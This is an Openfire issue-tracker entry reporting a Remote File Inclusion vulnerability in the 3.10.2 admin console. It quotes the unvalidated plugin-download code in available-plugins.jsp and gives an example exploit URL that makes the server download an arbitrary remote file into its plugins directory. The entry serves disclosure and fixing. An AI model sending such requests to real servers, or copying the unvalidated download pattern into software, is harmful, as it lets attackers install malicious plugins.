Uploaded image for project: 'Openfire'
  1. Openfire
  2. OF-1250 Old DWR causes CSRF, XSS in Admin Console
  3. OF-1020

Admin Console Remote File Inclusion (RFI) Vulnerability

    XMLWordPrintable

    Details

      Description

      hyp3rlinx reported that Openfire v3.10.2 suffers from a Remote File Inclusion (RFI) vulnerability.

      Full details: https://packetstormsecurity.com/files/133560/Openfire-3.10.2-Remote-File-Inclusion.html

      Vulnerability Details:
      In "available-plugins.jsp" there is no validation for plugin downloads, allowing arbitrary file downloads from anywhere on the internet.

      On line 40: all that needs to be satisfied is that the paramater is not null.

      boolean downloadRequested = request.getParameter("download") != null;
      String url = request.getParameter("url");
      

      If the above condition check returns true, the application downloads whatever file you give it.
      line 54:

          if (downloadRequested) {
              // Download and install new plugin
              updateManager.downloadPlugin(url);
              // Log the event
              webManager.logEvent("downloaded new plugin from "+url, null);
          }
      

      Exploit code(s):
      1) Download arbitrary file, e.g.

      http://[hostname]:[port]/available-plugins.jsp?download=1&url=http://www.igniterealtime.org/downloads/download-landing.jsp?file=openfire/openfire_4_0_0_beta.zip
      

      Our RFI will then be downloaded to the "openfire\plugins" directory.

        Attachments

          Activity

            People

            Assignee:
            dwd Dave Cridland
            Reporter:
            timd Tim Durden
            Votes:
            1 Vote for this issue
            Watchers:
            3 Start watching this issue

              Dates

              Created:
              Updated:
              Resolved: